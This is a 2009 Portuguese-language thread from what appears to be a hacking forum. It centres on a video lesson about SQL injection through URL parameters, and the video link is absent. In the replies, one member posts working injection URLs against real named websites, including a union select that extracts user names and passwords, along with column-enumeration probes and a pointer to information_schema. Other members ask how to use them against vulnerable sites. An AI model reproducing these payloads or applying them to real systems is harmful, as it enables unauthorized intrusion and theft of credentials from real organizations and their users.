O Melhor Fórum de Segurança da Web
Área destinada apenas a vídeos aulas sobre nossa modalidade.
por log_22 » 11 Mai 2009, 11:56
Nesta video-aula, explico como se aproveitar de falhas nos filtros das páginas injetando caracteres no seu GET, antes de assistirem queria dizer que antes que tentem gravar os comandos da video-aula, tentem entender a falha, como e quando ela acontece, pois ownar por ownar não é legal.
Obrigado e boa aprendizagem
Link para a video-aula:
Dúvidas apenas por forum, para entrar em contato comigo me mande uma MP
-
log_22
- Estudante
-
- Mensagens: 112
- Data de registro: 15 Nov 2006, 19:32
- Localização: FindWindow(nil, 'You are owned by log_22!');
-
por Marcelo Moraes » 11 Mai 2009, 20:32
Opa Log,
Mandou bem cara .
-
Marcelo Moraes
- Experiente
-
- Mensagens: 1266
- Data de registro: 07 Out 2007, 21:49
por Otávio Ribeiro » 11 Mai 2009, 20:57
Cara,
Nem todo programador é iniciante, Ele colocou o primeiro usuário da tabela do banco de dados sem privilégios administrativos. Portanto não ira poder fazer o loguin.
http://www.ibict.br/noticia.php?id=-469+union+all+select+nome,senha+from+usuarios--
[s]
- Otávio
-
Otávio Ribeiro
- Invasão Administrador
-
- Mensagens: 1080
- Data de registro: 01 Ago 2006, 18:39
- Localização: Goiás
-
por rmk90 » 11 Mai 2009, 21:07
Ah intendi Otávio.
Mas então teria que ter mais usuarios?! certo!?
Só q quando tu vai testar quantas tabelas possui o site ele diz só 2.
Ah e obrigado por ter respondido a minha dúvida no outro tópico.
-
rmk90
- Iniciante
-
- Mensagens: 16
- Data de registro: 29 Nov 2005, 18:52
por Otávio Ribeiro » 11 Mai 2009, 21:13
Cara,
Sim o site so possui duas tabelas veja abaixo ele vai te mostrar a senha é o usuário, porém e como citei logo acima sobre o administrador não ser iniciante:
http://www.ibict.br/noticia.php?id=-469+union+all+select+nome,senha+from+usuarios--
Quando a ter mais usuários, sim teria mais até hoje não vi nenhum método para descobrir os outros usuários do banco de dados, já olhei em fórums estrangeiros e também não encontrei.
[s]
- Otávio
-
Otávio Ribeiro
- Invasão Administrador
-
- Mensagens: 1080
- Data de registro: 01 Ago 2006, 18:39
- Localização: Goiás
-
por rmk90 » 11 Mai 2009, 21:37
Nossa, acredita que não testei a tag 'nome'. haha
Saquei, e em relação a segunda dúvida, tu sabe me dizer se os sites q possuem aquele erro tambem são vulneraveis?
-
rmk90
- Iniciante
-
- Mensagens: 16
- Data de registro: 29 Nov 2005, 18:52
por Otávio Ribeiro » 11 Mai 2009, 23:01
Cara,
Sim estão vulneráveis, porém você tera que utilizar os comandos information_schema para achar o nome do banco de dados.
http://estudioeletrico.com.br/pagina.php?id=60+group+by+11
http://www.agenciapulsar.org/coberturas_det2.php?id=45+group+by+5
]['s, Otávio Ribeiro
-
Otávio Ribeiro
- Invasão Administrador
-
- Mensagens: 1080
- Data de registro: 01 Ago 2006, 18:39
- Localização: Goiás
-
por badgateway » 15 Mai 2009, 17:31
Olá, log_22 será que poderia postar novamente o video...
Obrigado! (:
abraço!
-
badgateway
- Iniciante
-
- Mensagens: 4
- Data de registro: 15 Mai 2009, 13:21
por log_22 » 15 Mai 2009, 21:39
Editado, bons estudos amigos.
Dúvidas apenas por forum, para entrar em contato comigo me mande uma MP
-
log_22
- Estudante
-
- Mensagens: 112
- Data de registro: 15 Nov 2006, 19:32
- Localização: FindWindow(nil, 'You are owned by log_22!');
-
por mousefun » 14 Ago 2009, 16:30
link off
-
mousefun
- Iniciante
-
- Mensagens: 11
- Data de registro: 07 Mai 2008, 10:15
Retornar para Vídeos Aulas
